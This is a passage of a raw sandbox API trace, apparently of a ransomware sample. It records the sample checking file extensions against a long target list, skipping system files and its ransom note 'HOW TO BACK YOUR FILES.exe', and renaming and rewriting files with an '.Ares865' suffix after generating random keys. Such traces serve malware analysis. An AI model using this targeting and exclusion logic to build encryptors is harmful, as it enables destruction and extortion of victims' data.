lpString2="mwb") returned -1 [0063.479] lstrlenW (lpString="myd") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.479] lstrlenW (lpString="ndf") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.479] lstrlenW (lpString="nnt") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.479] lstrlenW (lpString="nrmlib") returned 6 [0063.479] lstrcmpiW (lpString1="es.jpg", lpString2="nrmlib") returned -1 [0063.479] lstrlenW (lpString="ns2") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.479] lstrlenW (lpString="ns3") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.479] lstrlenW (lpString="ns4") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.479] lstrlenW (lpString="nsf") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.479] lstrlenW (lpString="nv") returned 2 [0063.479] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.479] lstrlenW (lpString="nv2") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.479] lstrlenW (lpString="nwdb") returned 4 [0063.479] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.479] lstrlenW (lpString="nyf") returned 3 [0063.479] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.480] lstrlenW (lpString="odb") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.480] lstrlenW (lpString="odb") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.480] lstrlenW (lpString="oqy") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.480] lstrlenW (lpString="ora") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.480] lstrlenW (lpString="orx") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.480] lstrlenW (lpString="owc") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.480] lstrlenW (lpString="p96") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.480] lstrlenW (lpString="p97") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.480] lstrlenW (lpString="pan") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.480] lstrlenW (lpString="pdb") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.480] lstrlenW (lpString="pdm") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.480] lstrlenW (lpString="pnz") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.480] lstrlenW (lpString="qry") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.480] lstrlenW (lpString="qvd") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.480] lstrlenW (lpString="rbf") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.480] lstrlenW (lpString="rctd") returned 4 [0063.480] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.480] lstrlenW (lpString="rod") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.480] lstrlenW (lpString="rodx") returned 4 [0063.480] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.480] lstrlenW (lpString="rpd") returned 3 [0063.480] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.481] lstrlenW (lpString="rsd") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.481] lstrlenW (lpString="sas7bdat") returned 8 [0063.481] lstrcmpiW (lpString1="bles.jpg", lpString2="sas7bdat") returned -1 [0063.481] lstrlenW (lpString="sbf") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.481] lstrlenW (lpString="scx") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.481] lstrlenW (lpString="sdb") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.481] lstrlenW (lpString="sdc") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.481] lstrlenW (lpString="sdf") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.481] lstrlenW (lpString="sis") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.481] lstrlenW (lpString="spq") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.481] lstrlenW (lpString="te") returned 2 [0063.481] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.481] lstrlenW (lpString="teacher") returned 7 [0063.481] lstrcmpiW (lpString1="les.jpg", lpString2="teacher") returned -1 [0063.481] lstrlenW (lpString="tmd") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.481] lstrlenW (lpString="tps") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.481] lstrlenW (lpString="trc") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.481] lstrlenW (lpString="trc") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.481] lstrlenW (lpString="trm") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.481] lstrlenW (lpString="udb") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.481] lstrlenW (lpString="udl") returned 3 [0063.481] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.481] lstrlenW (lpString="usr") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.482] lstrlenW (lpString="v12") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.482] lstrlenW (lpString="vis") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.482] lstrlenW (lpString="vpd") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.482] lstrlenW (lpString="vvv") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.482] lstrlenW (lpString="wdb") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.482] lstrlenW (lpString="wmdb") returned 4 [0063.482] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.482] lstrlenW (lpString="wrk") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.482] lstrlenW (lpString="xdb") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.482] lstrlenW (lpString="xld") returned 3 [0063.482] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.482] lstrlenW (lpString="xmlff") returned 5 [0063.482] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0063.482] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.Ares865") returned 95 [0063.482] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.ares865"), dwFlags=0x1) returned 1 [0063.483] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.483] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6406) returned 1 [0063.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.484] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.484] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.484] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.484] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c10, lpName=0x0) returned 0x164 [0063.486] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c10) returned 0x190000 [0063.487] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.487] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.487] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.488] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.488] CloseHandle (hObject=0x164) returned 1 [0063.488] CloseHandle (hObject=0x154) returned 1 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.489] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hand Prints.htm", cAlternateFileName="HANDPR~1.HTM")) returned 1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="aoldtz.exe") returned 1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".") returned 1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="..") returned 1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="windows") returned -1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="bootmgr") returned 1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="temp") returned -1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="pagefile.sys") returned -1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="boot") returned 1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="ids.txt") returned -1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="ntuser.dat") returned -1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="perflogs") returned -1 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="MSBuild") returned -1 [0063.489] lstrlenW (lpString="Hand Prints.htm") returned 15 [0063.489] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 87 [0063.489] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Hand Prints.htm" | out: lpString1="Hand Prints.htm") returned="Hand Prints.htm" [0063.489] lstrlenW (lpString="Hand Prints.htm") returned 15 [0063.489] lstrlenW (lpString="Ares865") returned 7 [0063.489] lstrcmpiW (lpString1="nts.htm", lpString2="Ares865") returned 1 [0063.489] lstrlenW (lpString=".dll") returned 4 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".dll") returned 1 [0063.489] lstrlenW (lpString=".lnk") returned 4 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".lnk") returned 1 [0063.489] lstrlenW (lpString=".ini") returned 4 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".ini") returned 1 [0063.489] lstrlenW (lpString=".sys") returned 4 [0063.489] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".sys") returned 1 [0063.489] lstrlenW (lpString="Hand Prints.htm") returned 15 [0063.489] lstrlenW (lpString="bak") returned 3 [0063.489] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.489] lstrlenW (lpString="ba_") returned 3 [0063.489] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.489] lstrlenW (lpString="dbb") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.490] lstrlenW (lpString="vmdk") returned 4 [0063.490] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.490] lstrlenW (lpString="rar") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.490] lstrlenW (lpString="zip") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.490] lstrlenW (lpString="tgz") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.490] lstrlenW (lpString="vbox") returned 4 [0063.490] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.490] lstrlenW (lpString="vdi") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.490] lstrlenW (lpString="vhd") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.490] lstrlenW (lpString="vhdx") returned 4 [0063.490] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.490] lstrlenW (lpString="avhd") returned 4 [0063.490] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.490] lstrlenW (lpString="db") returned 2 [0063.490] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.490] lstrlenW (lpString="db2") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.490] lstrlenW (lpString="db3") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.490] lstrlenW (lpString="dbf") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.490] lstrlenW (lpString="mdf") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.490] lstrlenW (lpString="mdb") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.490] lstrlenW (lpString="sql") returned 3 [0063.490] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.490] lstrlenW (lpString="sqlite") returned 6 [0063.490] lstrcmpiW (lpString1="ts.htm", lpString2="sqlite") returned 1 [0063.490] lstrlenW (lpString="sqlite3") returned 7 [0063.490] lstrcmpiW (lpString1="nts.htm", lpString2="sqlite3") returned -1 [0063.490] lstrlenW (lpString="sqlitedb") returned 8 [0063.491] lstrcmpiW (lpString1="ints.htm", lpString2="sqlitedb") returned -1 [0063.491] lstrlenW (lpString="xml") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.491] lstrlenW (lpString="$er") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.491] lstrlenW (lpString="4dd") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.491] lstrlenW (lpString="4dl") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.491] lstrlenW (lpString="^^^") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.491] lstrlenW (lpString="abs") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.491] lstrlenW (lpString="abx") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.491] lstrlenW (lpString="accdb") returned 5 [0063.491] lstrcmpiW (lpString1="s.htm", lpString2="accdb") returned 1 [0063.491] lstrlenW (lpString="accdc") returned 5 [0063.491] lstrcmpiW (lpString1="s.htm", lpString2="accdc") returned 1 [0063.491] lstrlenW (lpString="accde") returned 5 [0063.491] lstrcmpiW (lpString1="s.htm", lpString2="accde") returned 1 [0063.491] lstrlenW (lpString="accdr") returned 5 [0063.491] lstrcmpiW (lpString1="s.htm", lpString2="accdr") returned 1 [0063.491] lstrlenW (lpString="accdt") returned 5 [0063.491] lstrcmpiW (lpString1="s.htm", lpString2="accdt") returned 1 [0063.491] lstrlenW (lpString="accdw") returned 5 [0063.491] lstrcmpiW (lpString1="s.htm", lpString2="accdw") returned 1 [0063.491] lstrlenW (lpString="accft") returned 5 [0063.491] lstrcmpiW (lpString1="s.htm", lpString2="accft") returned 1 [0063.491] lstrlenW (lpString="adb") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.491] lstrlenW (lpString="adb") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.491] lstrlenW (lpString="ade") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.491] lstrlenW (lpString="adf") returned 3 [0063.491] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.492] lstrlenW (lpString="adn") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.492] lstrlenW (lpString="adp") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.492] lstrlenW (lpString="alf") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.492] lstrlenW (lpString="ask") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.492] lstrlenW (lpString="btr") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.492] lstrlenW (lpString="cat") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.492] lstrlenW (lpString="cdb") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.492] lstrlenW (lpString="ckp") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.492] lstrlenW (lpString="cma") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.492] lstrlenW (lpString="cpd") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.492] lstrlenW (lpString="dacpac") returned 6 [0063.492] lstrcmpiW (lpString1="ts.htm", lpString2="dacpac") returned 1 [0063.492] lstrlenW (lpString="dad") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.492] lstrlenW (lpString="dadiagrams") returned 10 [0063.492] lstrcmpiW (lpString1="Prints.htm", lpString2="dadiagrams") returned 1 [0063.492] lstrlenW (lpString="daschema") returned 8 [0063.492] lstrcmpiW (lpString1="ints.htm", lpString2="daschema") returned 1 [0063.492] lstrlenW (lpString="db-journal") returned 10 [0063.492] lstrcmpiW (lpString1="Prints.htm", lpString2="db-journal") returned 1 [0063.492] lstrlenW (lpString="db-shm") returned 6 [0063.492] lstrcmpiW (lpString1="ts.htm", lpString2="db-shm") returned 1 [0063.492] lstrlenW (lpString="db-wal") returned 6 [0063.492] lstrcmpiW (lpString1="ts.htm", lpString2="db-wal") returned 1 [0063.492] lstrlenW (lpString="dbc") returned 3 [0063.492] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.492] lstrlenW (lpString="dbs") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.493] lstrlenW (lpString="dbt") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.493] lstrlenW (lpString="dbv") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.493] lstrlenW (lpString="dbx") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.493] lstrlenW (lpString="dcb") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.493] lstrlenW (lpString="dct") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.493] lstrlenW (lpString="dcx") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.493] lstrlenW (lpString="ddl") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.493] lstrlenW (lpString="dlis") returned 4 [0063.493] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.493] lstrlenW (lpString="dp1") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.493] lstrlenW (lpString="dqy") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.493] lstrlenW (lpString="dsk") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.493] lstrlenW (lpString="dsn") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.493] lstrlenW (lpString="dtsx") returned 4 [0063.493] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.493] lstrlenW (lpString="dxl") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.493] lstrlenW (lpString="eco") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.493] lstrlenW (lpString="ecx") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.493] lstrlenW (lpString="edb") returned 3 [0063.493] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.493] lstrlenW (lpString="epim") returned 4 [0063.493] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.493] lstrlenW (lpString="fcd") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.494] lstrlenW (lpString="fdb") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.494] lstrlenW (lpString="fic") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.494] lstrlenW (lpString="flexolibrary") returned 12 [0063.494] lstrcmpiW (lpString1="d Prints.htm", lpString2="flexolibrary") returned -1 [0063.494] lstrlenW (lpString="fm5") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.494] lstrlenW (lpString="fmp") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.494] lstrlenW (lpString="fmp12") returned 5 [0063.494] lstrcmpiW (lpString1="s.htm", lpString2="fmp12") returned 1 [0063.494] lstrlenW (lpString="fmpsl") returned 5 [0063.494] lstrcmpiW (lpString1="s.htm", lpString2="fmpsl") returned 1 [0063.494] lstrlenW (lpString="fol") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.494] lstrlenW (lpString="fp3") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.494] lstrlenW (lpString="fp4") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.494] lstrlenW (lpString="fp5") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.494] lstrlenW (lpString="fp7") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.494] lstrlenW (lpString="fpt") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.494] lstrlenW (lpString="frm") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.494] lstrlenW (lpString="gdb") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.494] lstrlenW (lpString="gdb") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.494] lstrlenW (lpString="grdb") returned 4 [0063.494] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.494] lstrlenW (lpString="gwi") returned 3 [0063.494] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.495] lstrlenW (lpString="hdb") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.495] lstrlenW (lpString="his") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.495] lstrlenW (lpString="ib") returned 2 [0063.495] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.495] lstrlenW (lpString="idb") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.495] lstrlenW (lpString="ihx") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.495] lstrlenW (lpString="itdb") returned 4 [0063.495] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.495] lstrlenW (lpString="itw") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.495] lstrlenW (lpString="jet") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.495] lstrlenW (lpString="jtx") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.495] lstrlenW (lpString="kdb") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.495] lstrlenW (lpString="kexi") returned 4 [0063.495] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.495] lstrlenW (lpString="kexic") returned 5 [0063.495] lstrcmpiW (lpString1="s.htm", lpString2="kexic") returned 1 [0063.495] lstrlenW (lpString="kexis") returned 5 [0063.495] lstrcmpiW (lpString1="s.htm", lpString2="kexis") returned 1 [0063.495] lstrlenW (lpString="lgc") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.495] lstrlenW (lpString="lwx") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.495] lstrlenW (lpString="maf") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.495] lstrlenW (lpString="maq") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.495] lstrlenW (lpString="mar") returned 3 [0063.495] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.495] lstrlenW (lpString="marshal") returned 7 [0063.496] lstrcmpiW 